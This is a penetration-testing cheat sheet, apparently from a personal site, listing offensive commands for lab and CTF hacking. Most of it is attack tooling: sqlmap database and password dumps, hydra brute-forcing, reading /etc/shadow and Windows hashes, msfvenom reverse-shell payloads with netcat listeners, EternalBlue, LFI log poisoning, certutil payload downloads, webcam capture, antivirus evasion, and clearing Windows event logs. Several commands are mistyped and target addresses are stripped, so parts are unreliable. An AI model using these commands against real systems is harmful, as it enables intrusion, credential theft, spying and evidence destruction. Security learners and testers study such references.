Hacker’s In Flight Guide

            Resources on the Fly!               
Quick References


nmap -A -T4 -p-
– common and popular for scanning everything
nmap -sV -vv --script vuln
– this looks for vulnerabilities with a script
nmap --script vuln -p 445
– searches for the most common vulnerabilities
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse
– enumerate smb using nmap
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount
– enumerate RPC using nmap


smbclient -L \

smbclient ///anonymous

– you can add directories after the target IP to try to connect
– this attempts to connect via smb
– you can try to connect with no password and see if it works


smbget -R smb:///anonymous
– download files on an SMB share


enum4linux -a | tee enum4linux.log.txt
– this usually screws up, but sometimes works well
– we tee it to a file while still looking at the output


unshadow /etc/passwd /etc/shadow > /tmp/readyforhashcat.txt
– this will print to an ‘unshadowed’ file, readable by hashcat

hashdump (meterpreter)

run post/windows/gather/hashdump
– done once you obtain a windows shell on a target box
– this is done within meterpreter


– this will open a GUI with dirbuster
– add ‘&’ at the end (dirbuster&) to continue to use the terminal window
– a wordlist will be needed to use dirbuster reconaissance
– Common Wordlist: /opt/DirBuster-0.12/directory-list-2.3-medium.txt


dirb http:/// /usr/share/wordlists/dirb/common.txt


gobuster -w /opt/DirBuster-0.12/directory-list-2.3-medium.txt -u

gobuster dir --url http:/// --wordlist /usr/share/wordlist/dirb/small.txt

– a tool used to search a server for directories specified in the wordlist


dirsearcy -u http://: -e php -x 400,404
– used to search directories on a server
– e = exclude status codes


sqlmap -u http:///i.php --forms --batch --passwords

sqlmap -u http:///i.php --forms --batch --dbs

sqlmap -u http:///i.php --forms --batch --tables -D testdb

sqlmap -u http:///i.php --forms --batch --dump -T users

sqlmap -u http:///i.php --forms --batch --dump


find / -perm /4000 -type f -exec ls -ld {} ; 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

– use the man file to know more
– this command will find SUID bit sets particular to 4000


– give this a shot as anonymous
– if you’re in, try putting a file onto the machine
– use msfvenom to create malware to upload


cadaver http:///vulnerable/directory
– used to interact with a website
– used to PUT files to a server


hydra -l -p /opt/rockyou.txt ssh://
– this brute forces services for login (ftp, ssh, etc…)


msfvenom -l | grep windows
– list the payloads available, and only show windows
msfvenom --help-formats
– shows all of the formats available
msfvenom -p windows/meterpreter/reverse_tcp

– options include:
– LHOST= LPORT=4444 -f aspx > ex.aspx
– LHOST= LPORT=4444 -f exe > sh.exe
– LHOST= LPORT=4444 -f war > shell.war

– 32 or 64 bit systems matter, so pay attention to the reverse shell
– p = payload
– f = file output
– put using ftp, or any other upload access
– use a handler to listen for the incoming connection
– Common Handlers: msfconsole, and netcat


python -m SimpleHTTPServer 80
– give access to wget and others on the target machine



mount :

– create directory to mount to using ‘mkdir’
– use enumeration to find a mountable folder on target (smb)


netcat -nvlp 4444
– a listener waiting for a payload to call back
– can use windows/shell/reverse_tcp as payload (msfvenom)


/opt/JohnTheRipper/run/ssh2john.py kay_id_rsa > forjohn.txt
– need to convert an RSA key so that john can crack it
/opt/JohnTheRipper/run/john forjohn.txt -wordlist=/opt/rockyou.txt
– there are several other options for john… google them if needed


On Windows
hashcat64.exe -a 0 -m hashfile.txt dictionary.txt
Great Resource:
Examples of Hashes (https://hashcat.net/wiki/doku.php?id=example_hashes)
Wireless .cap file
– Convert from .cap to a .hccapx file (google this)

– cap2hccapx
cap2hccapx.bin file.cap output.hccapx

– command example:
hashcat64.exe -m 2500 file.hccapx dictionary.txt
– newer versions only use hashcat.exe


hydra -l -P http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
– you can use a different thread count with -t
– you can use different protocols with ssh and others instead of post
hydra -l -P passlist.txt -t 4 ssh

hydra -l -P passlist.txt ftp://



nikto -host


wfuzz -c --hh 60 -w dictionary.txt http:///lfi.php?FUZZ=whoami

Web Local File Inclusion

GET http://page.php?page=/var/log/apache2/access.log
inject to request under user-agent:
NOTE: you can use a ‘+’ where there would be a space in a command.


wpscan –url http://apocalyst.htb –enumerate vp


cewl > list.txt
– CeWL (Custom Word List generator) is a ruby app which spiders a given URL, up to a specified depth, and returns a list of words which can then be used for password crackers

DirBuster (GUI)

– used after creating a wordlist with CeWL
– The results will show different sizes and can be analyzed


Common Windows quick way in

Win 7 7601 SP1
msfconsole> search MS17-010
– This is an extremely common vulnerability called EternalBlue
– use auxiliary/scanner/smb/smb_ms17_010
– set the standard options for meterpreter
– set payload as windows/x64/meterpreter
– can also google ‘Eternalblue’ to see some GitHub magic

Ubuntu Mount Shared Drive on VMWare

sudo vmhgfs-fuse -o nonempty -o allow_other .host:/data ./testmnt

Kali Create and Mount New Drive in VMWare

fdisk -l

g (create GPT partition table)
n (add a new partition – select your size – I used defaults)
w (write table to disk and exit)

mkfs.ext4 /dev/sdb1
mkdir /mnt/newdrive
mount -t ext4 /dev/sdb1 /mnt/newdrive
mkdir /mnt/newdrive/test
chown kali:kali /mnt/newdrive/test (asumes Kali 2020a)

make mount permanent through reboots
vim /etc/fstab
add to the bottom line of the file
/dev/sdb1 /mnt/newdrive ext4 defaults 0 0

Unstable Shell –> Stable Shell

python -c "import tpy; pty.spawn('/bin/bash')"

python -c 'import pty; pty.spawn("/bin/bash")'

– gives a shell
^z to foreground the shell
stty raw -echo

– can’t type at this point…
specify F, G at the shell
export TERM=xtern

^l (that’s an el)

– now you can use the shell as normal

background (metasploit)

msf> background

– used to put a session in the background of msfconsole
– retrieve the session with msf> set session

msf> ^z can also be used to backround

sessions -l (that’s an el)

– used to list the open sessions after using background

suggester (metasploit)

msf> use post/multi/recon/local_exploit_suggester

– used once you are on a box
– set standard options and run



– TIP: set the LHOST as tun0 (easier than typing your IP)
– Useful Commands while in meterpreter:
– search to find possible exploit or module
– use # the number can be from the search criteria
– ^z to send a session to background
– sessions -l (that’s an el) to list sessions
– sessions -i # to interact with a background session

Common Commands after connecting include:
– getuid
– sysinfo
– pwd
– history
– whoami
– ls -alh
– uname -a
– touch
– getsyustem
– migrate

– clearev to clear application, system, and sescurity logs on Windows
– execute -f file.exe -i -H to execute a file on Windows target
– search -f file*.bat c:xamp to search for a file in a directory
– shell to get a to a standard shell instead of meterpreter
– webcam_list and webcam_snap to use a computer’s webcam
– download or upload
– run post/windows/gather/checkvm check for a virtual machine
– run post/multi/recon/local_exploit_suggester scan for suggestions
– run post/windows/manage/enable_rdp force RDP to be available
– run autoroute -h learn to use autoroute
– search server/socks4a start a proxy server from this session
– look for a script online called ‘LinEnumj.sh’, and ‘linuxprivchecker.py’


– this is a GUI (installed on Kali and ParotOS)
– [PROXY TAB] –> [OPTIONS TAB] shows how to intercept traffic
– In a browser –> Manual Proxy –> –> port 8080 –> all protocols
– BurpSuite –> turn intercept on
– use the FORWARD button to see the page reload to BurpSuite
– right click on returns –> send to TOOLS as needed
– REPEATER, INTRUDER, DECODER are some of the tools
– Brute Force –> highlight a section to set it up for changes
– [PAYLOADS TAB] –> put your list into the opstions, simple list
– uncheck the URL-encode at the bottom of the page
– clock START ATTACK –> look for indicators that it worked

bash scripting

– this is a complicated topic… you can automate your commands
– use #!/bin/bash to start your script
– as an example, you can use bash to convert to Base64

echo ' | base64

echo '' | base64 --decode

echo -n 'user:pass' base64

– Script: $(cat file.txt); do echo -n $cred | base64; done
– Note: $(cat file.txt) represents a variable

chmod for Windows

C:> icacls myfile.txt /grant Everyone:F

– this is for chmod 777


– used in Powershell to enumerate
– upload to Windows, then chmod to 777 (see above)
C:> . .PowerUp.ps1 (that’s a dot, space, dot, forwardslash)

C:> Invoke-AllChecks

Windows – start/stop Service

C:> sc start

Wget for Windows


C:> certutil -urlcache -f http:///sh.exe c:sh.exe

– use whatever file you want in place of sh.exe
– once in a shell, run the sh.exe to reach out to the listener


Wapalyzer (for browsers)

– this is an install within your browser
– it will help with website enumeration


– this is a good resource to have in the back pocket
– very useful for privilege escalation

psexec.py / wmiexec.py / smbexec.py

psexec.py pentest:’P3nT3st!’@
– locate in the /opt/impacket/ folder
– installed with git clone, and then pip install
– good when you’re up against antivirus
– not as detectable as metasploit meterpreter


./linpeas.sh | tee linpeas.log.txt
– a great way to check a machine from the inside
– must upload first, then execute on target machine
– the tee command sends output to a file, while still seeing results

GitHub Suggester

python windows-exploit-suggester.py --database mssb.xls --systeminfo sysinfo.txt
– look for Sherlock or Watson on the web
– the syntax for the exploit is on the GitHub site
– system info was supplied by previous shell access


– google for it, and upload it to target computer
– popular and easy
– change the LPORT, and LHOST
– set up a netcat listener to retrieve the connection

Spawn a TTY shell

– google for it, look for netsec in the results
– this will be needed if your privs don’t allow a TTY shell
– example script: python -c ‘import pty; pty.spawn( /bion/bash);

Scroll to top